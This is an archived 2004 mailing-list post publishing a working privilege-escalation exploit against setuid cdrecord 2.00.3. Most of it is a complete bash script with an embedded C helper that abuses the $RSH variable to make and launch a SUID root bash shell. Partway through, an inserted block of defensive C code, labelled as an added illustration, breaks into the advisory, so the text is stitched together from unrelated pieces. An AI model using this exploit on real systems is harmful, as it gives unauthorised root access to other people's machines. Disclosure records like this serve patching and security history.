CAU-EX-2004-0002: cdrecord-suidshell.sh
Sun Sep 12 01:03:52 2004
From: "I)ruid" <druid@caughq.org>
To: bugtraq@securityfocus.com
Cc: full-disclosure@lists.netsys.com
Message-Id: <1094830948.8634.433.camel@zelda.corporate>
Date: Fri, 10 Sep 2004 10:42:28 -0500
Computer Academic Underground
http://www.caughq.org
Exploit Code
===============/============================================================
Exploit ID: CAU-EX-2004-0002
Release Date: 09/09/2004
Title: cdrecord-suidshell.sh
Description: cdrecord $RSH exec() SUID Shell Creation
Tested: cdrecord 2.00.3
Attributes: Privileged Access
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0002.txt
Author/Email: I)ruid <druid@caughq.org>
===============/============================================================
Description
===========
This shell script writes out and compiles a small C program which sets
its UID to its EUID, copies /bin/bash to the current directory and makes
the copy SUID. The script then uses cdrecord's handling of the $RSH
environment variable, which is exec()'d before privileges are dropped, to
run that program. It then cleans up after itself and executes the SUID
shell for convenience.
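As an added defensive illustration (not part of this advisory and not cdrecord's own code), the following C sketch shows the pattern that closes this class of bug: a setuid program that refuses to honour a relative or non-allowlisted $RSH while its real and effective UIDs differ, and that drops privileges irrevocably before any exec(). The allowlist, DEFAULT_RSH and the function names are assumptions made for the example.

```c
/* Added example: hardened handling of an environment-supplied helper
   program inside a setuid binary. Not cdrecord's code. */
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_RSH "/usr/bin/rsh"   /* hypothetical compile-time default */

/* Accept only an absolute path, free of "..", that is on a short
   allowlist. A value such as "./cpbinbash" is rejected. */
int rsh_path_allowed(const char *path) {
    static const char *allow[] = { "/usr/bin/rsh", "/usr/bin/ssh", "/bin/rsh", NULL };
    if (path == NULL || path[0] != '/' || strstr(path, "..") != NULL)
        return 0;
    for (int i = 0; allow[i] != NULL; i++)
        if (strcmp(path, allow[i]) == 0)
            return 1;
    return 0;
}

/* Pick the program to exec. When real and effective UID differ the
   environment is controlled by a less privileged caller, so a
   non-allowlisted $RSH is ignored in favour of the built-in default. */
const char *choose_rsh(uid_t ruid, uid_t euid, const char *env_rsh) {
    if (env_rsh == NULL || env_rsh[0] == '\0')
        return DEFAULT_RSH;
    if (ruid != euid && !rsh_path_allowed(env_rsh))
        return DEFAULT_RSH;
    return env_rsh;
}

/* Irrevocably drop to (uid, gid): group first, while still privileged,
   then user, then verify the drop took effect. A full implementation
   would also clear supplementary groups with setgroups() first.
   Returns 0 on success, -1 on any failure (fail closed). */
int drop_privileges(uid_t uid, gid_t gid) {
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;
    if (getuid() != uid || geteuid() != uid) return -1;
    if (uid != 0 && setuid(0) == 0) return -1;  /* could regain root */
    return 0;
}

/* Exec the helper only after privileges are gone; never returns on
   success. */
int run_rsh(const char *rsh, char *const argv[]) {
    if (drop_privileges(getuid(), getgid()) != 0) return -1;
    execv(rsh, argv);
    return -1;  /* exec failed */
}
```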
Notes
=====
This exploit is written assuming your target shell is bash.
Credits
=======
Max Vozeler is credited with discovering this vulnerability as stated
in the Mandrake Linux security advisory MDKSA-2004:091.
References
==========
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0806
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:091
Exploit
=======
#!/bin/bash
#
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
#
# Exploits cdrecord's exec() of $RSH before dropping privs
#
cat > ./cpbinbash.c << __EOF__
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

main( int argc, char *argv[] ) {
    int fd1, fd2;
    int count;
    char buffer[1];

    /* Set ID's */
    setuid( geteuid() );
    setgid( geteuid() );

    /* Copy the shell */
    if ((fd1=open( "/bin/bash", O_RDONLY))<0)
        return -1;
    if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
        return -1;
    while((count=read(fd1, buffer, 1)))
        write(fd2, buffer, count);
    free(buffer);
    close( fd1 );
    close( fd2 );

    /* Priv the shell */
    chown( "./bash", geteuid(), geteuid() );
    chmod( "./bash", 3565 );
}
__EOF__

cc ./cpbinbash.c -o ./cpbinbash

# Set up environment
export RSHSAVE=$RSH
export RSH=./cpbinbash

# Sploit
cdrecord dev= REMOTE:CAU:1,0,0 -

# Cleanup
rm cpbinbash*
export RSH=$RSHSAVE
export RSHSAVE=

# Use our suid bash
./bash -p